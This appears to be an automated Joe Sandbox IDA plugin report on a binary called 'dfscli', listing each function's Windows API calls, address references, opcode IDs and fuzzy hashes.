                                                                  • Instruction ID: 941fb14b8e6e74046c3674dea832eee8b0a2cfa7b7099c50836eeb20d6140e2c
                                                                  • Opcode Fuzzy Hash: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
                                                                  • Instruction Fuzzy Hash: 0FD0C730705301BFD7106B63DC0DF1A3A58AE44B05B485D357446D01B0CF74C851E52D
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C230
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C292
                                                                  • VariantClear.OLEAUT32(00000007), ref: 0040C5C0
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C735
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                    • Part of subcall function 00408A64: SystemTimeToVariantTime.OLEAUT32(?), ref: 00408AB2
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C715
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                  • String ID:
                                                                  • API String ID: 2075586698-0
                                                                  • Opcode ID: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction ID: 6ab10ce611a99a1f8f361261b98790ac6c7d0aa24a7c23b9a0ac30f561102aa8
                                                                  • Opcode Fuzzy Hash: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction Fuzzy Hash: BCE12B7580011CEACF15EB94C991AFEBB79BF18304F0441ABF845B32D1EB385A49DB69
                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,004322C4,00000001,?,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 004155F2
                                                                  • GetLastError.KERNEL32 ref: 00415604
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 00415666
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0040FE1B,?,00000000), ref: 004156E4
                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004156F6
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3581945363-0
                                                                  • Opcode ID: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction ID: a1f57d75a495807adbd5f9f81b07e7c36f1fa25e7f2b40525a61db36998abfa5
                                                                  • Opcode Fuzzy Hash: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction Fuzzy Hash: CC41E231900A15EBCF219F51DC46EEF7B75FF88760F14052AF814A6290D7388991DBE8
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C758
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C80A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C88B
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C89A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C8A9
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0040C8BE
                                                                    • Part of subcall function 0040C22B: __EH_prolog.LIBCMT ref: 0040C230
                                                                    • Part of subcall function 0040C22B: VariantClear.OLEAUT32(?), ref: 0040C292
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                  Similarity
                                                                  • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                  • String ID:
                                                                  • API String ID: 3098219910-0
                                                                  • Opcode ID: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction ID: 36662450c5e1947f06e528152222194ba2e0adfdc782b58db195a1114ff86cd1
                                                                  • Opcode Fuzzy Hash: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction Fuzzy Hash: 33512AB1A00209DFDB24DFA4C884BEEB7B8FF44305F10462EE516E7291D778A945CB68
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00426F0B
                                                                  • GetParent.USER32(?), ref: 00426F19
                                                                  • GetParent.USER32(?), ref: 00426F2C
                                                                  • GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                  • IsWindowEnabled.USER32(?), ref: 00426F50
                                                                  • EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                  • String ID:
                                                                  • API String ID: 670545878-0
                                                                  • Opcode ID: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction ID: 07f23732e05c0ddae676fdba191ad6f2f3c3259ccd052a946048ec3c933e7ffc
                                                                  • Opcode Fuzzy Hash: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction Fuzzy Hash: 0411063230823157CE316A5A7E40B2BB29C5F68B50FC7002BED10D3304EB28CC0246DD
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 004266CA
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 004266DE
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004266EC
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004266FE
                                                                  • PtInRect.USER32(?,?,?), ref: 0042670E
                                                                  • GetWindow.USER32(?,00000005), ref: 0042671B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                  • String ID:
                                                                  • API String ID: 1315500227-0
                                                                  • Opcode ID: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction ID: 83608b20ab5d7acfc5f4007f6359faa5a2816e21795921f9c93a6bd5c83018c8
                                                                  • Opcode Fuzzy Hash: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction Fuzzy Hash: 2F018F35300125ABDB21AF56AC08EAF3B68AF44751F810026F91193190DB34D9028BA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-2386870291
                                                                  • Opcode ID: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
                                                                  • Instruction ID: e63f41d058283e0c0eb0ae7a93c28366d44745800656fe3e600f804c74b5ca7e
                                                                  • Opcode Fuzzy Hash: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
                                                                  • Instruction Fuzzy Hash: E2312971904701EADB249F36AD45BDB37A4DF95314F24447BF909E2282FB7C8981839D
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00421F77
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F89
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F9A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00421FB6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID: (
                                                                  • API String ID: 2178440468-3887548279
                                                                  • Opcode ID: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction ID: 4f815d2d5e0452abf6b21b186733e73ea544739a7e03d6a9e74580ef656ef9a0
                                                                  • Opcode Fuzzy Hash: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction Fuzzy Hash: 063105353003249FCB20AF6AE984A6FB7B4BF14314F95052EF552977A1DB39E805CB98
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041FFB6
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0041FFD5
                                                                  • IsWindowEnabled.USER32(00000000), ref: 0041FFE0
                                                                  • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 0041FFF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledItemLongMessageSend
                                                                  • String ID: Edit
                                                                  • API String ID: 3499652902-554135844
                                                                  • Opcode ID: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction ID: 3fda86f08f798bfc712dbe9114479d5ed61c9c1c5043182bfc70c8b50dcb543f
                                                                  • Opcode Fuzzy Hash: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction Fuzzy Hash: EF01C830300221AAFA302A26BC05B9BB7966F11759F94443BF402D12A2CBE9DCC6C55C
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00432A70,00000010,004107C0,00000000,00000FA0,76230A60,00000000,00411F62,0040E8F2,?,00431A70,00000060), ref: 00416AD3
                                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00416AE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: InitializeCriticalSectionAndSpinCount$`#vp,$v$kernel32.dll
                                                                  • API String ID: 1646373207-1530109648
                                                                  • Opcode ID: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction ID: ce44358daea0c9ea577a3d839c8de632687c57e94c437d53c63a589a871009e4
                                                                  • Opcode Fuzzy Hash: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction Fuzzy Hash: 86F05430740302EFDB28AFA5DD05B8E36A4AF45394F64D17BA412E26A0D7BCD9849A1D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00410526), ref: 004169FB
                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00416A0B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32$`#vp,$v
                                                                  • API String ID: 1646373207-3967587774
                                                                  • Opcode ID: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction ID: f7e75c8983afe75b452e8c5a0e3795a3a9e97458d4fb11f8d1bffce13407fbee
                                                                  • Opcode Fuzzy Hash: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction Fuzzy Hash: BCC01270350300AAE9606B622D19F56218C6F18B83F1904667503F01A0CB68C081653D
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042B2F8
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0042B323
                                                                  • VariantClear.OLEAUT32(0000000C), ref: 0042B47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariantlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2416264355-0
                                                                  • Opcode ID: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction ID: 2154954aee45bc9f37d5e476858aa3f54607d5b4520b193f721ce322dcdb1a24
                                                                  • Opcode Fuzzy Hash: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction Fuzzy Hash: 9381D471A01629EBCF10DF55E881AAEBBB0FF05358F90851AF854AB251C738D991CBD8
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,0040E699,?), ref: 004122AB
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 00412329
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 0041238E
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 004123B2
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 00412412
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlocked$QueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2947987494-0
                                                                  • Opcode ID: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction ID: d666452b32fb370f5039d9c4d9c953f1fa938a618f22207ba933b66a0757dcd5
                                                                  • Opcode Fuzzy Hash: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction Fuzzy Hash: 8F511530A006158FCB288F28DB817EA73A5BB49314F64957BD851C72A1E3FCDCE2864D
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00412BE6
                                                                  • GetFileType.KERNEL32(?), ref: 00412C90
                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 00412D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleInfoStartupType
                                                                  • String ID:
                                                                  • API String ID: 2461013171-0
                                                                  • Opcode ID: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction ID: d278a9e66e7a289658028d0007e01ec58958c44d3a53fc808e972aab8f93b423
                                                                  • Opcode Fuzzy Hash: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction Fuzzy Hash: 6A512A702047418FD7208F68DD847A677E4FB12328F24863ED696CB2E1E7B8D4A6C749
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction ID: cd14ed6faf968c26f5ad3f682f5955487037b3cb07160dd73ebcc5381cbba43c
                                                                  • Opcode Fuzzy Hash: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction Fuzzy Hash: 3341F3B1D00225AACF30BFA69C848AFBA74EB55728710453FFD15B66D1D33C4D898A9C
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040483B
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00404847
                                                                  • LockResource.KERNEL32(00000000), ref: 0040485C
                                                                  • FreeResource.KERNEL32(00000000), ref: 0040488F
                                                                  • GetDlgItem.USER32(?,00000000), ref: 00404939
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeItemLoadLock
                                                                  • String ID:
                                                                  • API String ID: 996205394-0
                                                                  • Opcode ID: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction ID: 6aec8b371c9fab22d9bb11c82ff679e6f8f2bf4797d8e8c33563a997009e8f8d
                                                                  • Opcode Fuzzy Hash: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction Fuzzy Hash: DF514EB5A00209EFCB14DF66C484AAEBBB5FF84314F14847AE916AB391D738E941CF54
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004070B4
                                                                  • SendMessageA.USER32(?,00000138,?,?), ref: 00407138
                                                                  • GetBkColor.GDI32(?), ref: 00407141
                                                                  • GetTextColor.GDI32(?), ref: 0040714D
                                                                  • GetThreadLocale.KERNEL32(0000F1C0), ref: 004071DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                  • String ID:
                                                                  • API String ID: 741590120-0
                                                                  • Opcode ID: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction ID: 20cee96fae53f77c6612ec2f8febb233d27f76521b7ee9c4483379ac0ab0fb9c
                                                                  • Opcode Fuzzy Hash: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction Fuzzy Hash: 7C518E30904306DFCB10EF65C8445AAB7B0FF44314B10896EF856AB3A1E778B955CB6A
                                                                  APIs
                                                                    • Part of subcall function 00426ED9: GetParent.USER32(?), ref: 00426F2C
                                                                    • Part of subcall function 00426ED9: GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                    • Part of subcall function 00426ED9: IsWindowEnabled.USER32(?), ref: 00426F50
                                                                    • Part of subcall function 00426ED9: EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  • EnableWindow.USER32(?,00000001), ref: 00426FB7
                                                                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 00426FCB
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00427041
                                                                  • MessageBoxA.USER32(?,?,?,000000F0), ref: 00427065
                                                                  • EnableWindow.USER32(?,00000001), ref: 00427081
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                  • String ID:
                                                                  • API String ID: 489645344-0
                                                                  • Opcode ID: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction ID: 94a83bf1e9e898c293309cd3d0189100989e43beb641fad24fa4ba7b3a2eaaf4
                                                                  • Opcode Fuzzy Hash: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction Fuzzy Hash: 4531E531B043689FEF309FA5ED80B9EB7B4AF05700F55002EEA05AB281DBB99D058B55
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                  • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0040E622
                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0040E648
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                  • String ID:
                                                                  • API String ID: 4136887677-0
